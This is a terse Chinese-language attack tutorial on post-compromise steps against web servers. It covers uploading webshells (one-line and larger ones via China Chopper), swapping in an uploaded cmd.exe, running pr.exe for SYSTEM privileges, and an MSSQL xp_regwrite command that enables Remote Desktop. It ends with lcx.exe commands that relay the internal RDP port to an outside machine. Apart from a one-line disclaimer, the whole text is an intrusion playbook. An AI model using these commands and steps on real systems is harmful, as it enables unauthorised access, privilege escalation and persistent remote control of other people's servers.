一、一般脚本所处的权限
1、asp/php 匿名权限
2、aspx user权限
3、jsp 系统权限
二、不同脚本,权限也不同
1、上传普通一句话木马,然后用菜刀连接
2、进入终端,输入命令
3、我们上传一个大马,访问
4、输入命令,可以正常执行
三、cmd无法执行
1、上传一个大马,访问
2、进入cmd命令界面,发现不能执行
3、找一个可读写目录,上传本地的cmd.exe
4、把路径修改为我们上传的路径,执行命令
四、PR提权
一、执行whoami获取权限
二、上传pr.exe,重新获取权限,直接就是system权限
五、MSSQL提权
1、打开sqltools,输入ip、端口、用户名、密码、数据库名,然后点击连接,提示连接成功
2、dos命令可以成功执行
3、连接3389提示错误
4、执行下面命令,打开3389
exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,‘SYSTEM\CurrentControlSet\Control\Terminal Server’,‘fDenyTSConnections’,‘REG_DWORD’,0;–
5、继续连接3389端口
内网
六、端口转发
1、将lcx.exe上传到服务器,运行
lcx.exe -slave 192.168.171.128(外网) 2222 127.0.0.1(内网) 3389
2、在本地运行
lcx.exe -listen 1111 2222
3、打开远程桌面连接,输入127.0.0.1:2222,成功连接
禁止非法,后果自负
